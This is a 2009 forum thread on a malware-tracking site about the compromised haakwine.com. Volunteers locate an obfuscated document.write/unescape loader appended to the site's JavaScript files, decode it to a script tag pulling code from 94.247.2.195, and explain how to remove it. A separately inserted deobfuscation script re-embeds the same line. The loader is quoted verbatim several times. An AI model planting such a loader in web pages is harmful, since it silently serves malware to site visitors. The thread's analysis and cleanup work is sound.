Malware Domain List

Malware Related => Compromised Servers => Topic started by: gabbafam on April 16, 2009, 12:32:59 pm

Title: haakwine.com compromised
Post by: gabbafam on April 16, 2009, 12:32:59 pm
Hi, I am a novice user that is having the malicious site 94.247.2.195 blocked every time I access one website, www.haakwine.com. I did a Yahoo search on the 94.247.2.195 and found this malware domain list and forum. I don't know if you are the right person to post a reply to, but I am really wanting to find out how to clean this off this website, because I am the website updater and don't know why it is doing this. Can you offer any help whatsoever? I would be greatly indebted to you.
I think you could be right :( ..... the following is the uncompressed output from the PDF;

/edit

MysteryFCM: Disabled link and removed code from quoted post. Split and moved to compromised servers forum
Title: Compromised
Post by: MysteryFCM on April 16, 2009, 12:39:32 pm
I've checked the site you referenced and cannot find anything suspicious. Is this the site you are having difficulty with?

/edit

Nevermind, found it. The code is at the bottom of mm_menu.js (disable this file or replace it with a clean copy);

Code:
document.write(unescape('sV%3CuhIscAHriLSkpt%20LSksLSkrcJaN%3DuhI%2FLSk%2FZt9CgA4uhI%2E2uhI47uhI%2EAH2%2E195%2FjuhIqJaNuuhIerZty%2EjuhIs%3ELSk%3C%2FsVscripLSktuhI%3E').replace(/uhI|Zt|LSk|AH|sV|CgA|JaN/g,""));
This decodes to;

Code:
<script src=//94.247.2.195/jquery.js></script>
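The decoding step described above, written out as an added example (not code from the thread): it pulls the percent-encoded string and the junk-token alternation out of the injected `document.write(unescape(...).replace(...))` line, applies both steps, and extracts the external script source so it can be searched for or blocked. The `PATTERN` regex is an assumption about this specific loader shape, not a general JavaScript parser.

```javascript
// Added example: recover the tag emitted by the obfuscated loader quoted in the thread.
// Constructed sample: the exact line reported at the bottom of mm_menu.js.
const INJECTED = `document.write(unescape('sV%3CuhIscAHriLSkpt%20LSksLSkrcJaN%3DuhI%2FLSk%2FZt9CgA4uhI%2E2uhI47uhI%2EAH2%2E195%2FjuhIqJaNuuhIerZty%2EjuhIs%3ELSk%3C%2FsVscripLSktuhI%3E').replace(/uhI|Zt|LSk|AH|sV|CgA|JaN/g,""));`;

// Assumed loader shape: unescape('<encoded>').replace(/<tok1|tok2|...>/g, "")
// Group 1 = percent-encoded payload, group 2 = the alternation of junk tokens.
const PATTERN = /unescape\('([^']*)'\)\s*\.replace\(\/([^\/]+)\/g\s*,\s*(?:""|'')\)/;

// Decode %XX sequences ourselves instead of calling the deprecated global unescape().
// The sample only uses two-digit escapes, so %uXXXX is not handled here.
function percentDecode(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Returns the string the loader would pass to document.write, or null if the
// source does not match the expected obfuscation pattern.
function deobfuscate(source) {
  const m = PATTERN.exec(source);
  if (!m) return null;
  const [, encoded, tokenAlternation] = m;
  const decoded = percentDecode(encoded);
  // Same single-pass global replace the loader performs: strip every junk token.
  const junk = new RegExp(tokenAlternation, 'g');
  return decoded.replace(junk, '');
}

// Pull the src attribute out of the recovered <script> tag (unquoted or quoted).
function externalScriptSrc(html) {
  const m = /<script\s+src=["']?([^"'\s>]+)/i.exec(html);
  return m ? m[1] : null;
}

const recovered = deobfuscate(INJECTED);
console.log(recovered);                 // <script src=//94.247.2.195/jquery.js></script>
console.log(externalScriptSrc(recovered)); // //94.247.2.195/jquery.js
```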
Title: Compromised
Post by: GmG on April 16, 2009, 12:43:36 pm
There's a malware script in mm_menu.js

Code:
<!--
document.write(unescape('sV%3CuhIscAHriLSkpt%20LSksLSkrcJaN%3DuhI%2FLSk%2FZt9CgA4uhI%2E2uhI47uhI%2EAH2%2E195%2FjuhIqJaNuuhIerZty%2EjuhIs%3ELSk%3C%2FsVscripLSktuhI%3E').replace(/uhI|Zt|LSk|AH|sV|CgA|JaN/g,""));
 -->
Title: Compromised
Post by: MysteryFCM on April 16, 2009, 12:45:27 pm
heh yep, updated my post whilst you were posting ....
Title: Compromised
Post by: MysteryFCM on April 16, 2009, 12:47:25 pm
Script is also present in;

http://www.haakwine.com/Scripts/AC_RunActiveContent.js
Title: Re: haakwine.com compromised
Post by: SysAdMini on April 16, 2009, 01:11:28 pm
It is also present in the last line of
Code:
www.haakwine.com/mm_menu.js

http://wepawet.cs.ucsb.edu/view.php?hash=fc23e5732b039b053d6bd7a04a30fdec&t=1239885919&type=js
Title: Re: haakwine.com compromised
Post by: gabbafam on April 16, 2009, 03:03:39 pm
I wish I knew all that you all know on this forum. I am sure this is a stupid question for you, but "how do you disable a file?" Thank you so much.
Title: Re: haakwine.com compromised
Post by: RS-232 on April 16, 2009, 03:13:31 pm
By "disable", it simply means removing the code posted above from the html/php files where it is present...

Quote
document.write(unescape('sV%3CuhIscAHriLSkpt%20LSksLSkrcJaN%3DuhI%2FLSk%2FZt9CgA4uhI%2E2uhI47uhI%2EAH2%2E195%2FjuhIqJaNuuhIerZty%2EjuhIs%3ELSk%3C%2FsVscripLSktuhI%3E').replace(/uhI|Zt|LSk|AH|sV|CgA|JaN/g,""));
Title: Re: haakwine.com compromised
Post by: RS-232 on April 16, 2009, 11:11:18 pm
Speaking of it...
http://blog.scansafe.com/journal/2009/4/14/malware-manipulating-google-serps.html